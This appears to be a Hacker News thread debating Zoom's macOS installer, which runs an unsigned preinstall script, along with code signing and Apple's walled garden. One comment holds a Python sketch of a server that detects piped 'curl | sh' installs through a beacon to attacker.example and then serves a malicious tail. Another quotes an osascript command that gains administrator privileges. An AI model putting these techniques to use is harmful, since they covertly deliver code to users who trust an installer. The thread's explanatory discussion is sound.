Doing a fast google for these domains shows they are mostly known for being associated with malware...
Pretty bad solution if that was indeed the case.
"just to shut the error up" is about right.
I'm not intending to demean non-native English speakers or their ability to write code, but this looks pretty bad from a QA standpoint.
edit: elsewhere in the thread it's shown that most of the software engineering team is in China, which explains this.
To see for yourself, simply `curl -I https://zoom.us`
†: I didn't misspell the name of the executable. It's missing an h.
A little ‘humour’ is allowed, right?
Ty for making me laugh.
It is also reported that their engineering team are not native English speakers but I don't think that's the main issue. I've seen codebases full of spelling errors where all developers were native speakers.
I've seen a lot of posts defending Zoom wrt other offences. But at this point it should be clear what their practices are.
Sometimes when coding I think there is technically an obscure race condition security flaw and, from time to time, leave a TODO instead of spending those grueling hours. This weirdly makes me sleep better at night.
At any rate, "sunlight is the best disinfectant"!
My point is that Zoom is replaceable and, in fact, IMO should be replaced. Their tactic of using these dodgy techniques is to gain an edge over the competition along the lines of "it just works".
I would contrast this to pure research services that add value that would otherwise not be there. Examples of this would be at the time that they were startups: Google (search algorithms) or Spotify (music categorisation algorithms). I'm not saying that today either of Google or Spotify are paragons of morality. At the hardware level I would include Tesla (battery tech) and Intel (processors).
My point is that the shady practices are at this point Zoom's product offering. If their video scaling algorithms are superior (and not just lifted from some open-source libraries), then that should be their product offering, not "it just works" via security exploits.
Later, when I heard that Zoom installs and leaves a web server open on your machine, even if you uninstall it, I felt duped, since I did my due diligence by Googling whether it's malware. If it leaves a web server running after uninstall, it's obviously malware, same as if it launched a Windows search for "passwords.txt". There's no real room for interpretation here.
But I didn't find that at the time.
Whereas if I did that Google search today I would find that it:
monitors activity on your computer -
is not encrypting end to end despite claims - https://news.ycombinator.com/item?id=22735746
allows any web site to access your camera at any time without requesting any kind of permission or making the user aware - https://news.ycombinator.com/item?id=20387298
reinstalls itself silently after uninstall (if you click a zoom link, after uninstall) -
If I were considering installing it today, I would install it only in a virtual machine after Googling what kind of protections to use when trying malware in a VM. (Since it can be expected to play shenanigans with your network and with the host's USB devices etc.) Just basic stuff, as Zoom isn't very sophisticated.
After I read all this I was angry. Not because all of this makes it obviously malware but because it's sloppy malware, and I specifically Googled whether it was sloppy, obvious malware and didn't get a clear "yes, Zoom is malware."
By the way sending data to Facebook doesn't make my list of links, as that is par for the course and anyone might do that. I have a pretty high tolerance for crap and to be honest Zoom is the only mainstream software that failed it so far.
Though I guess technically I still use Zoom every day (until I buy a new computer), you know, since I did install it that one time, before I uninstalled it...
Didn't stop them from becoming very successful.
They get away with it because they aren't liable for any damage caused by exploitation of vulnerabilities caused by their bad practices. If they had to indemnify the victims of their negligence, I guarantee they'd care a lot more about doing things right.
Code signing just says you can trust that the software you clicked on came from the actual developer.
It doesn't say anything at all about what the software does. Of course signed software can do whatever it wants. It's not like there's supposed to be some chain of trust that it's only allowed to run further signed code. It's free to run a Python script or shell command or whatever it wants. And installers certainly run scripts.
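To make the point concrete, here's a minimal Python sketch (the script text is obviously hypothetical): once a signed binary is running, nothing in the signing machinery inspects what it hands to a shell.

```python
# A signed program handing arbitrary, unsigned text to a shell at runtime.
# Code signing verified the program on disk; it says nothing about this.
import subprocess

script = 'echo "whatever the vendor (or whoever edited this script) wants"'
result = subprocess.run(["/bin/sh", "-c", script],
                        capture_output=True, text=True)
print(result.stdout.strip())
```

The signature check happened before launch; by the time this `sh -c` runs, the OS has no further opinion.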
And as other comments here state, to do anything that requires root privileges, it pops up to ask for your admin password, so it's not getting around that.
I see references to this being a "malware pattern" but no explanation of why or what that means specifically. Zoom is commercial software (not malware) and I don't see how this is a vulnerability (something malware could take advantage of) so I'm not getting it.
Can someone explain what the problem is here? Or is there no problem?
If the binary runs an unsigned script, then that script could be modified to do something malicious.
Signing isn't difficult or expensive so why not insist on it?
You get the zoom signed package installing your unsigned code.
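And pinning helper scripts is cheap. A minimal sketch, assuming a hypothetical allowlist the signed installer could carry inside its own (signed) bundle; the digest below is just sha256 of the word "test", standing in for a real script's digest:

```python
import hashlib

# Hypothetical allowlist the signed installer ships: script name -> pinned
# SHA-256 of the exact bytes it is willing to execute.
PINNED = {
    # sha256(b"test"), a stand-in for the real script's digest
    "preinstall.sh": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08",
}

def verify_script(name: str, data: bytes) -> bool:
    """Refuse to run a helper script unless its bytes match the pin."""
    expected = PINNED.get(name)
    return expected is not None and hashlib.sha256(data).hexdigest() == expected

print(verify_script("preinstall.sh", b"test"))             # True: untampered
print(verify_script("preinstall.sh", b"test # tampered"))  # False: rejected
```

That's maybe a dozen lines on top of what the installer already does, which is why "signing is hard" isn't much of an excuse.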
But the truth is you don't really need to do that. If people are coming to your own domain you can ship them whatever you want. I'd wager that well below 1/1,000,000 users actually verify signatures on binaries. For the huge majority of users, there is little you can do to prevent this.
did not try/verify though
The network can't do it if it is downloaded over TLS. A malicious host can already ship evil scripts. Malware on the local machine can already do worse than edit a script.
> Malware on the local machine can already do worse than edit a script.
Malware on the local machine may not have root rights. You're basically arguing that privilege escalation isn't a real threat.
What is the threat model?
To me, all this looks like people knowing that signing is somehow good and demanding it in a context where it isn't clear that it makes sense. And given that the top post in this thread is about skeevy domains, how the heck would signing scripts achieve anything? Even the reposted tweet says "don't think you could weaponize".
This is equivalent to not having signatures on your repository packages and saying "no biggie, we rely on transport encryption". It might work in most cases, but there's a reason good security uses layers. A failure at any point (TLS downgrade attack, repo compromise, proxy compromise, DNS poisoning) can result in your preflight script executing malicious code.
Requiring code signing with a pinned cert would solve this issue, but would be terribly out of character for the company that brought us a hidden local REST API to bypass OSX security prompts.
Same with the recent story about UNC links in Zoom chat. That's an issue in Windows: why is Windows sending your password hash out on the internet willy-nilly? It's 2020; Microsoft should know better.
Consider that any Mac app that:
* Supports plugins that aren't signed by Apple
* Executes scripts or macros from a file
would technically have the same "problem". That's a heck of a lot of apps.
On iOS Apple do insist on a full chain of security, which is why only Apple's own browser app can JIT code. It's an extremely perverse and serious limitation that has no real security justification: consider that Android manages just fine without it.
As far as I can tell, Zoom is currently the target of a witch hunt. People are digging for dirt and blowing stuff well out of proportion.
(Someday there will be a solid cross-platform native p2p video client with e2e encryption.)
> We designed iMessage and FaceTime to use end-to-end encryption, so there’s no way for Apple to decrypt the content of your conversations when they are in transit between devices.
The Zoom witch hunt is really something. Zoom may or may not be a witch (I'm no China apologist; I yell at all my friends for using TikTok), but if we get the answer right it will be based on luck and emotion, not logic and reason.
Zoom is an American company, headquartered in the US, employing mostly Americans, subject to US law, etc. Its CEO is an immigrant, but that's true of half the American tech companies out there, including Google and Microsoft.
EDIT: I'm white, but my wife is Asian-American and has told me more than once how white people often treat Asian-Americans as if they're not real Americans. I'd never witnessed that myself, but I guess the above comment is the kind of sentiment she's talking about. Zoom may or may not be a scummy company, but its founder's birthplace is immaterial. He's a US citizen, and deserves the same treatment we give to maybe-scummy white American CEOs like Mark Zuckerberg.
"“Our product development team is largely based in China, where personnel costs are less expensive than in many other jurisdictions,” Zoom wrote in a regulatory filing."
Zoom is a US company that is not answerable to the Chinese government. Like many companies, Zoom has chosen to outsource some of its operations, and those overseas offices create various infosec risks. And given that Zoom infosec seems to be a total clown show, those infosec risks are probably more serious at Zoom. But that would be equally true of any other American company that is really lax about security and too cheap to employ American developers.
Given that we have such horrible laws even in the "more democratic" parts of the world, such as Australia, it is not unthinkable that the Chinese government may ask a Chinese developer to install a backdoor into a foreign-based product they are working on:
> The Electronic Frontier Foundation has said police could order individual IT developers to create technical functions without their company's knowledge.
If that was true, then events like the Huawei USA "Tappy"  incident wouldn't have occurred. In any case, I'm not trying to take a stance here but merely wanted to correct your statement that they had more engineers in the US than in China.
Huawei USA is almost certainly majority controlled by Huawei China, whereas Zoom's Chinese subsidiary is almost certainly majority controlled by the US parent company. Hence, Huawei is a Chinese company for practical purposes (the people calling the shots will go to jail if they don't do what the CCP wants) and Zoom is an American company (the people calling the shots go to jail if they break American law, and are mostly out of reach of the CCP).
Is there an unsigned app/package included with all Mac OS X installs?
> the number of Mac users running 100% signed code
You just have to ask yourself:
There might be exploits out there that escape the sandbox, but those are unintended. Here, Zoom is intentionally widening an exploit by being reckless. So thanks to Zoom, we might now expect even more drastic sandboxing in the next macOS release.
> the number of Mac users running 100% signed code is well over 50%
Would you say he meant "number of users running exclusively sandboxed code"? Or do you claim he means "number of users running 100% signed code outside the sandbox"? The only claim that would even make sense is "more than 50% of Mac users run exclusively sandboxed code". And it can't mean "app sandbox", but any kind of sandbox? Like, do java programs qualify? Is the JVM malware? If you install a signed app that requires the JRE, do you also install something that could run unsigned code?
I'm beginning to think the same thing. Someone seems to be orchestrating a full out attack on Zoom. I'd say it's working.
However, it’s bafflingly weird to include such a thing just to skip a button press or two in the installer.
Not at all. Generally, every extra mouse click required to get an app running slashes your user base by some staggering amount, like 20-50%. I can't quite recall the exact number or where I've seen it, but I've definitely heard this from multiple sources, including at Google. Try counting how many clicks are required to get Chrome onto your system and you'll be surprised how optimised it is.
Companies measure this, they're very sensitive to it of course. They want as many conversions as possible, but they can see that the more complex the install process gets, the fewer users make it through the other end. It's entirely normal for Zoom to want to simplify as much as possible.
All in all, Apple does their best to provide the mechanisms, but they are not necessarily easy or trivial (we're dealing with security, so what else would you expect). Also, with every step Apple takes to lock things down, there is a public outcry that they are restricting people's freedom to install custom applications and pushing everyone into the App Store ecosystem.
This of course doesn't excuse bad developer practices, but often it's a choice between doing things right and not being able to do them at all (never meeting your deadlines).
I had the pleasure of implementing one of the suggested privilege escalation systems in a pet project, and it was a fun puzzle for me. But I can tell you it will be a PITA if you have to solve this problem under pressure, as (even though Apple provides some tooling to verify everything) it's really hard to figure out whether all the moving components are set up right for everything to work, and to debug any issues.
 https://developer.apple.com/library/archive/samplecode/SMJob... https://github.com/brenwell/SMJobBless-Demo
- Send X bytes of the script
- Send the line `curl my.server.com/asdjkfh`
- Stop sending data, wait for a request to `/asdjkfh`
- If you receive said request, start sending malicious data
- If you don't, wait 5 seconds and continue sending a "fake" script
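The steps above can be sketched as a small Python generator. Everything here is hypothetical (the beacon URL, the payloads); it just shows how a server could branch mid-transfer on whether the beacon came back:

```python
import time

BENIGN_LINE = 'echo "installing..."\n'
BEACON_LINE = "curl -s https://attacker.example/asdjkfh\n"  # hypothetical beacon
EVIL_LINE   = 'echo "malicious payload would go here"\n'    # harmless placeholder

def serve_script(beacon_received, wait=5.0, poll=0.05):
    """Stream a script TOCTOU-style. beacon_received() should return True
    once /asdjkfh has been requested, i.e. the client is piping the
    download straight into a shell rather than saving it to inspect."""
    yield BENIGN_LINE
    yield BEACON_LINE
    deadline = time.monotonic() + wait
    while time.monotonic() < deadline:
        if beacon_received():
            yield EVIL_LINE      # live pipe-to-shell: send the malicious tail
            return
        time.sleep(poll)
    yield BENIGN_LINE            # plain download: stay clean for inspection
```

`curl ... | sh` executes lines as they arrive, so the beacon fires before the transfer ends; someone who downloads the file to read it first never triggers the beacon and gets the innocuous version.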
He knows theoretically that this could be spyware or worse, but hey, everybody else is using it. Seems like no big deal.
Same with that curl script. What are the chances it’s bad? Small. So you run it and hope for the best.
Edit to add: I mean, I hope they’ll lose a substantial number of paying customers over this? But I doubt it.
I don't get why people are so negative. I mean zoom is not unique in this sense, many of the everyday apps we use share at least some of these issues.
How many of us use Intel CPUs that had (and still have) a seemingly infinite number of vulnerabilities? Or macOS, which at one point allowed root to log in without a password? How many security issues do we (software engineers) create on a daily basis simply because management needs something for yesterday?
Yes, me too! I was going to edit my comment again to clarify, but I figured it wasn’t worthwhile trying to list all the caveats explicitly. But yes, if they fix this stuff and continue to be successful, that would be good.
> How many security issues do we (software engineers) create on a daily basis simply because management needs something for yesterday?
I disagree with your premise there. Sure, security bugs can sneak in if you’re rushed, but that’s qualitatively different from actively exploiting security holes and using dark UI patterns to make your own life easier. I hope most engineers would refuse to implement feature requests like that. It should be considered a form of malpractice.
Very few. Zoom is written with a total disregard to security.
The reason is that we are living in an age of cognitive overload and time poverty. Time and cognitive space are far more expensive than the long tail risks associated with bad security and privacy.
I'm not sure about binaries in general (having secure boot as an anchor at least makes the exercise less futile), but there's an interesting point brought up here:
Dynamic linker, dynamic libraries and dlopen.
I see solaris has elfsign - and it appears to be in OpenSolaris too:
Not sure if it would work on Linux, and you might want to prevent running unsigned binaries; not sure if that's a thing on OpenSolaris. Still, being able to verify a binary might help with handling random downloads, I suppose.
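As an illustration of why the dynamic linker matters here: even a fully signed interpreter will happily map whatever shared object you point it at. A ctypes sketch (libm is just a stand-in for "some .so on disk"; nothing checks a signature on the file being loaded):

```python
import ctypes, ctypes.util

# Locate and load a shared library at runtime. The loader resolves and maps
# it with no signature check; any readable .so path would do just as well.
path = ctypes.util.find_library("m")   # the C math library, as a stand-in
libm = ctypes.CDLL(path)
libm.sqrt.restype = ctypes.c_double
libm.sqrt.argtypes = [ctypes.c_double]
print(libm.sqrt(9.0))  # prints 3.0
```

Signing the main executable says nothing about what `dlopen()` (which is what `CDLL` wraps) pulls in later, which is the gap elfsign-style verification tries to close.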
> Modules built and shipped by Canonical with the official kernels are signed by the Canonical UEFI key and as such are trusted. Custom-built modules will require the user to take the necessary steps to sign the modules before loading them is allowed by the kernel.
but... installing Zoom already asks for my consent, through an OS prompt. Do you want to have to type your user password twice for every app you install, or what?
In fact I never understood why the HN crowd finds this policy so inoffensive. I've always considered it a massive intrusion on computing freedom.
I find it really shocking that "it is ok for a single entity to decide which software you can run on a device you own, with no accountability whatsoever", is now apparently a mainstream opinion on a tech forum. And more disturbingly, you make your case by arguing against the very notion of broadly-available general-purpose computing.
It comes down to how you perceive the technology. My MacBook Pro is a tool I use for work that needs to be highly flexible and configurable, so I’m willing to work to maintain it. My iPhone is a convenience. I will not put work into maintaining a convenience, that defeats the point.
Others view their phones differently; they may elect for more configurability at the expense of maintenance burden. That's their choice to make. I, for example, view the idea of wanting to root one's phone as absolutely insane.
I use Linux as my main OS even though I don't really customize it that much and never looked at the source code, because I think it's important that critical infrastructure (as operating systems are) should be open. I don't use Spotify, not because I think it's too expensive or inconvenient, but because I worry that the convenience of streaming can train us to not insist on our freedom to listen to music in DRM-free formats (I don't know if it exists already, but I kind of expect platform-exclusive music to be a thing soon). I use Firefox, not because I think it's better than Chromium but because I want to help avoid Google completely dominating the web, even at its endpoints, etc etc.
In the iPhone case, my worry is that if people get used to a smartphone not being a general purpose computing device, they can also be trained to view their laptop that way. I hope I don't need to argue why that would be a bad thing.
I dreamed about having a portable computer, somewhat like what my phone is now, when I was a kid. It ended up even cooler than I imagined it. The eventual device that came along has amazing battery life, oodles of CPU, RAM, and secondary storage, a wide array of sensors, multiple cameras with high resolution sensors and great optics, water resistance, exceptional build quality, a very small form factor, and it's at a price point that's reasonable. It's all great, except that I don't actually own it and can't use it for what I want.
Giving up control of the devices we own is dangerous. It most certainly is a slippery slope. The manufacturers will use "security" and "privacy" as a way to erect walled gardens on our heretofore general purpose computing devices. They will use the walled gardens to extract more revenue from developers and end users, and they'll act as police over what are "acceptable" applications. The average non-technical person doesn't understand why it's a problem, and those of us who are technical should be championing ownership instead of giving up control.
Chromebooks had a physical interlock that enabled/disabled the "trusted" functionality (perhaps they still do-- I haven't followed them). That is an acceptable solution, to me. It wouldn't be difficult to do, either. The fact that manufacturers don't include such functionality speaks volumes about their motivations.
It certainly looks like a slippery slope from where I'm standing. People have gotten used to not having full ownership of their phones, and tablets are kinda just big phones, so people have gotten used to not having full ownership of their tablets. But a tablet is also kind of like a small, highly portable laptop, and in fact many people use them as such. The boundary between the two is also blurring, with tablets becoming more laptop-like and laptops becoming more tablet-like.
I don't think it's a huge leap from here to fear that we are witnessing a trend, and that our ownership of our true general-purpose computing devices, such as our laptops, is not something we should take for granted.
Manufacturers could include physical interlocks to allow this "trusted" functionality. Early (all?) Chromebooks had this kind of functionality. Manufacturers aren't including it because that locks in their revenue streams, and owners aren't demanding it because the average non-technical user (and, apparently, plenty of technical people too) doesn't understand the value of being able to control the devices you own.
Fact is, the third-party Apple ecosystem just moves more slowly, breaking less but fixing less too.
Tradeoffs, not superiority, are the choices offered to consumers currently.
Interesting that we didn't know Zoom did this until everyone started using it, and someone finally audited it.
/usr/bin/osascript -e 'do shell script "touch /tmp/ran_successfully " with administrator privileges'
Are they the biggest?
Besides that, this certainly isn't the first time Zoom's shady practices have been exposed, where many other conferencing products haven't had such a track record.
Zoom has been repeatedly breaking the trust of their users - it's a clear pattern that won't change.
Moreso than others? I deal with customers/partners all the time, and I count the following desktop clients installed on my laptop:
- Skype for Business
- Hangout Meet
And I'm probably missing a bunch. Is Zoom that much bigger?
Now it is the market leader. Hence all the bad P.R.
Zoom's CEO was the head engineer for WebEx.
Also public, profitable.
E.g., if a majority (or even a strong minority) of people in a country bends a rule, you change the rule to accommodate them; you don't put 30% of your population in jail.
If Zoom were a country, it would be roughly the 10th-largest European country by population. You can't just ignore that.
Again, I'm playing devil's advocate for a pro-walled-garden opinion I myself don't believe in, so don't take my opinion too seriously.
Pure cynicism on my part by default, so it's all good, mate.
App Store, Gatekeeper, etc are now working against what they were supposed to solve and encouraging worse developer behavior.
Really, the best solution would be to tackle the reasons why Zoom is doing this in the first place, like how Apple provided a gentler version of sandboxing to work around pro creative apps being basically unusable in the first versions.
The more you lock it down the more bad behavior you'll encourage from less ethical developers.
Are you talking about something else or am I misunderstanding here?
Yes it is.
Just based on the title, consider that web browsers are signed binaries that run any unsigned script :)
"China-born entrepreneur hit a snag. The U.S. government denied his visa application -- eight times.
After two years of rejection, Yuan, 49, finally made it to the U.S. and is now the major shareholder of video conference services firm Zoom Video Communications Inc."
I do not know what their visa denial rate was but I am happy they persisted :)
but most of the conversation is missing:
"This comment is currently under review for potential violation of the GitLab Code of Conduct.
For more information, please reach out to firstname.lastname@example.org."
so we'll never know what's the end story there. If someone knows I'm curious.
Though personally, I don't think China is more of a danger than the US, or any local spying organisation of your choice.
It's opensource, free and doesn't require user accounts. Plus you can host it yourself.
This is yet another indication that nobody at Zoom has a clue about how to build a secure and stable application. Another example of that mindset was released today: https://www.theverge.com/2020/3/31/21201956/zoom-leak-user-i... They are proving that they completely fail to understand how to design security/privacy features. Frankly, their technology team sounds like total amateurs who hack things together.
Public, profitable, founder was Head Engineer for Cisco WebEx. Runs global videoconferencing under massive new load during Covid-19, on their own servers.
HN comment: "total amateurs".
Love this place.
You're free to analyse it and publish your findings. That's not making Zoom any better.